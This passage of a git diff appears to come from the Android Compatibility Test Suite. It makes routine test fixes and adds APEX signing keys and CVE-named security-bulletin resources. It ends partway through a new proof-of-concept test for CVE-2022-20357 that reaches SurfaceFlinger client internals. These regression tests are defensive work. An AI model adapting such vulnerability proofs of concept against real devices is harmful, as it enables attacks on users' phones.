-        GridLayout layout = mInstructionView.findViewById(R.id.buttons);
-        layout.addView(btn);
+            GridLayout layout = mInstructionView.findViewById(R.id.buttons);
+            layout.addView(btn);
+        });
     }
 
     /**
diff --git a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
index aa87d2a..377e089 100644
--- a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
+++ b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
@@ -17,15 +17,12 @@
 package com.android.cts.appcompat;
 
 import static com.google.common.truth.Truth.assertThat;
-import static org.junit.Assert.assertEquals;
-import static org.junit.Assert.assertTrue;
 
 import android.compat.cts.CompatChangeGatingTestCase;
 
 import com.google.common.collect.ImmutableSet;
 
 import java.util.HashMap;
-import java.util.HashSet;
 import java.util.Map;
 import java.util.Set;
 import java.util.regex.Matcher;
@@ -66,7 +63,7 @@
         final long configId = getClass().getCanonicalName().hashCode();
 
         installPackage(Q_TEST_APK, false);
-        Thread.currentThread().sleep(100);
+        Thread.currentThread().sleep(200);
         setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
 
         try {
@@ -86,7 +83,7 @@
         final Set<Long> disabledChanges = ImmutableSet.of();
 
         installPackage(Q_TEST_APK, false);
-        Thread.currentThread().sleep(100);
+        Thread.currentThread().sleep(200);
         setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
 
         try {
@@ -116,7 +113,7 @@
         final Set<Long> enabledChanges = ImmutableSet.of(SELINUX_LATEST_CHANGES);
         final Set<Long> disabledChanges = ImmutableSet.of();
         installPackage(R_TEST_APK, false);
-        Thread.currentThread().sleep(100);
+        Thread.currentThread().sleep(200);
         setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
 
         try {
diff --git a/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml b/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
index 4c5734c..9454b60 100644
--- a/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
+++ b/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
@@ -27,5 +27,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="com.android.server.cts.device.statsd"
          android:label="CTS tests of android.os.statsd stats collection">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey
new file mode 100644
index 0000000..e6ffe58
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey
new file mode 100644
index 0000000..4288519
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey
new file mode 100644
index 0000000..bef1df6
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey
new file mode 100644
index 0000000..ef0438e
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey
new file mode 100644
index 0000000..0d978b8
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey
new file mode 100644
index 0000000..3ad68fc
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey
new file mode 100644
index 0000000..4e5acae
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey
new file mode 100644
index 0000000..969211f
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey
new file mode 100644
index 0000000..0b720b8
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey
new file mode 100644
index 0000000..a7f87c3
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey
new file mode 100644
index 0000000..3f09680
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey
new file mode 100644
index 0000000..f37d3e4
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey
new file mode 100644
index 0000000..f705184
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey
new file mode 100644
index 0000000..b9164fb
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey
new file mode 100644
index 0000000..3b6411d
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey
new file mode 100644
index 0000000..98dfb71
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey
new file mode 100644
index 0000000..8f7cf72
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey
new file mode 100644
index 0000000..0302d63
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey
new file mode 100644
index 0000000..a6ca630
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey
new file mode 100644
index 0000000..63fba77
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey
new file mode 100644
index 0000000..c1b8dda
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey
new file mode 100644
index 0000000..e95ecbe
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey
new file mode 100644
index 0000000..4e74bb1
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey
new file mode 100644
index 0000000..d78af8b
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey
new file mode 100644
index 0000000..9eaf852
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey
new file mode 100644
index 0000000..94d4e70
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey
new file mode 100644
index 0000000..63bbfab
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey
new file mode 100644
index 0000000..ccdd6d6
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey
new file mode 100644
index 0000000..479a868
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey
new file mode 100644
index 0000000..497aa29
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey
new file mode 100644
index 0000000..79ab8db
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey
new file mode 100644
index 0000000..f408d2b
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey
new file mode 100644
index 0000000..e98ee34
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey
new file mode 100644
index 0000000..1fc39e1
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey
new file mode 100644
index 0000000..0c28e11
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
index b73c8d7..844111e 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
@@ -30,14 +30,13 @@
 import com.android.tradefed.util.FileUtil;
 import com.android.tradefed.util.ZipUtil;
 
-import org.hamcrest.CustomTypeSafeMatcher;
-import org.hamcrest.Matcher;
+import com.google.common.truth.Expect;
+
 import org.junit.AfterClass;
 import org.junit.Before;
 import org.junit.Ignore;
 import org.junit.Rule;
 import org.junit.Test;
-import org.junit.rules.ErrorCollector;
 import org.junit.rules.TestRule;
 import org.junit.runner.Description;
 import org.junit.runner.RunWith;
@@ -87,7 +86,7 @@
     private ITestDevice mDevice;
 
     @Rule
-    public final ErrorCollector mErrorCollector = new ErrorCollector();
+    public final Expect mExpect = Expect.create();
 
     @Before
     public void setUp() throws Exception {
@@ -153,8 +152,8 @@
 
             while (it.hasNext()) {
                 final File wellKnownKey = (File) it.next();
-                verifyPubKey("must not use well known pubkey", pubKeyFile,
-                        pubkeyShouldNotEqualTo(wellKnownKey));
+                mExpect.withMessage(entry.getKey() + " must not use well known pubkey")
+                        .that(areKeysMatching(pubKeyFile, wellKnownKey)).isFalse();
             }
         }
     }
@@ -192,7 +191,8 @@
         try {
             apexes = mDevice.getActiveApexes();
             for (ITestDevice.ApexInfo ap : apexes) {
-                if (!ap.sourceDir.startsWith("/data/")) {
+                // Compressed APEXes on /system are decompressed to /data/apex/decompressed
+                if (!ap.sourceDir.startsWith("/data/apex/active")) {
                     mPreloadedApexPathMap.put(ap.name, ap.sourceDir);
                 }
             }
@@ -279,24 +279,14 @@
         assertThat(mWellKnownKeyFileList).isNotEmpty();
     }
 
-    private <T> void verifyPubKey(String reason, T actual, Matcher<? super T> matcher) {
-        mErrorCollector.checkThat(reason, actual, matcher);
-    }
-
-    private static Matcher<File> pubkeyShouldNotEqualTo(File wellknownKey) {
-        return new CustomTypeSafeMatcher<File>("must not match well known key ") {
-            @Override
-            protected boolean matchesSafely(File actual) {
-                boolean isMatchWellknownKey = false;
-                try {
-                    isMatchWellknownKey = FileUtil.compareFileContents(actual, wellknownKey);
-                } catch (IOException e) {
-                    e.printStackTrace();
-                }
-                // Assert fail if the keys matched
-                return !isMatchWellknownKey;
-            }
-        };
+    private static boolean areKeysMatching(File pubkey, File wellknownKey) {
+        try {
+            return FileUtil.compareFileContents(pubkey, wellknownKey);
+        } catch (IOException e) {
+            throw new AssertionError(
+                    "Failed to compare " + pubkey.getAbsolutePath() + " and "
+                            + wellknownKey.getAbsolutePath());
+        }
     }
 
     /**
diff --git a/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
index 15d382b..5331c28 100644
--- a/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
@@ -24,5 +24,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.appsecurity.cts.apkveritytestapp"
                      android:label="CTS test app of apk verity">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>/>
 </manifest>
diff --git a/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml b/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
index 8b3e7e4..b582828 100755
--- a/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
+++ b/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
@@ -24,5 +24,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.compilation.cts.appusingotherapp"
                      android:label="An instrumentation test that uses another app">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/compilation/status_checker_app/AndroidManifest.xml b/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
index 3c53636..9c2a878 100755
--- a/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
+++ b/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
@@ -20,5 +20,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.compilation.cts.statuscheckerapp"
                      android:label="An instrumentation test that checks optimization status">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml b/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
index a1ee42c..5b19966 100644
--- a/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
@@ -51,6 +51,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="Delegated Cert Installer CTS test"
          android:targetPackage="com.android.cts.certinstaller">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
index e81c523..b6ebb20 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
@@ -43,5 +43,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="Profile and Device Owner CTS Tests API 23"
          android:targetPackage="com.android.cts.deviceandprofileowner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
index c22cb2f..abe12e1 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
@@ -39,5 +39,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="Profile and Device Owner CTS Tests"
          android:targetPackage="com.android.cts.deviceandprofileowner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
index efd7260..07d5bd0 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
@@ -39,5 +39,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="Profile and Device Owner CTS Tests"
          android:targetPackage="com.android.cts.deviceandprofileowner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
index ad4ec40..caafec7 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
@@ -148,5 +148,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="Profile and Device Owner CTS Tests"
          android:targetPackage="com.android.cts.deviceandprofileowner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
index 602f9ee..ed5bf39 100644
--- a/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
@@ -98,5 +98,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="com.android.cts.deviceowner"
          android:label="Device Owner CTS tests">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml b/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
index 8f842a2..782b25e 100644
--- a/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
@@ -74,5 +74,7 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.telephony.cts.sms.simplesmsapp">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml b/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
index c7088b2..f63f46e 100644
--- a/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
@@ -40,5 +40,7 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="com.android.cts.testime">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml b/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
index 6a863ad..e2b1268 100644
--- a/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
+++ b/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
@@ -45,5 +45,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
        android:targetPackage="android.appwidget.cts"
        android:label="CTS Tests for the dumpsys protobuf protocol">
+      <meta-data android:name="listener"
+           android:value="com.android.cts.runner.CtsTestRunListener"/>
   </instrumentation>
 </manifest>
diff --git a/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml b/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
index 977b888..75f05b1 100644
--- a/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
+++ b/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
@@ -24,5 +24,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.media.cts"
             android:label="Device test app for MediaExtractor host side tests.">
+        <meta-data android:name="listener"
+                android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21118.bin b/hostsidetests/securitybulletin/res/cve_2023_21118.bin
new file mode 100644
index 0000000..6dc2aaa
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21118.bin
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21127.ogg b/hostsidetests/securitybulletin/res/cve_2023_21127.ogg
new file mode 100644
index 0000000..f5e9deb
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21127.ogg
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21261.ttf b/hostsidetests/securitybulletin/res/cve_2023_21261.ttf
new file mode 100644
index 0000000..882ad96
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21261.ttf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v1-only-10-signers.apk b/hostsidetests/securitybulletin/res/v1-only-10-signers.apk
new file mode 100644
index 0000000..198beeb
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v1-only-10-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v1-only-11-signers.apk b/hostsidetests/securitybulletin/res/v1-only-11-signers.apk
new file mode 100644
index 0000000..95e6c61
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v1-only-11-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v2-only-10-signers.apk b/hostsidetests/securitybulletin/res/v2-only-10-signers.apk
new file mode 100644
index 0000000..ad34c14
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v2-only-10-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v2-only-11-signers.apk b/hostsidetests/securitybulletin/res/v2-only-11-signers.apk
new file mode 100644
index 0000000..674b6e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v2-only-11-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp
new file mode 100644
index 0000000..579666e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+    name: "CVE-2022-20357",
+    defaults: [
+        "cts_hostsidetests_securitybulletin_defaults",
+    ],
+    srcs: [
+        "poc.cpp",
+    ],
+    shared_libs: [
+        "libgui",
+        "libutils",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp
new file mode 100644
index 0000000..ad773c8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define private public
+
+#include <gui/SurfaceComposerClient.h>
+#include <gui/SurfaceControl.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+int main() {
+    constexpr int32_t val = 0;
+    constexpr int32_t width = 100;
+    constexpr int32_t height = 100;
+    std::string layerName = "layerName";
+    constexpr int32_t createFlags =
+            ISurfaceComposerClient::eCursorWindow | ISurfaceComposerClient::eOpaque;
